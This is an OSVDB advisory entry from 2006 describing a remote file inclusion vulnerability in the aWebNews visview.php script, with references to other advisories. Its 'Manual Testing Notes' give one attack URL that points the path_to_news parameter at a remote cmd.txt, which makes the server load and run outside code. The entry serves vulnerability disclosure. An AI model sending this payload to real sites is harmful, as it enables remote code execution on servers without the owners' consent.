aWebNews visview.php path_to_news Variable Remote File Inclusion

2006-06-13T16:28:44
ID OSVDB:27670
Type osvdb
Reporter OSVDB
Modified 2006-06-13T16:28:44

Description

Vulnerability Description

Remote/Network Access Required Information Disclosure Attack

Short Description

Remote/Network Access Required Information Disclosure Attack

Manual Testing Notes

http://[target]/aWebNews/visview.php?path_to_news=http://target.com/cmd.txt?

References:

Vendor URL: http://labs.aweb.com.au/awebnews.php Packet Storm: http://packetstorm.linuxsecurity.com/0606-exploits/aWebNews.txt Other Advisory URL: http://www.root-security.org/danger/aWebNews.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0242.html Bugtraq ID: 18406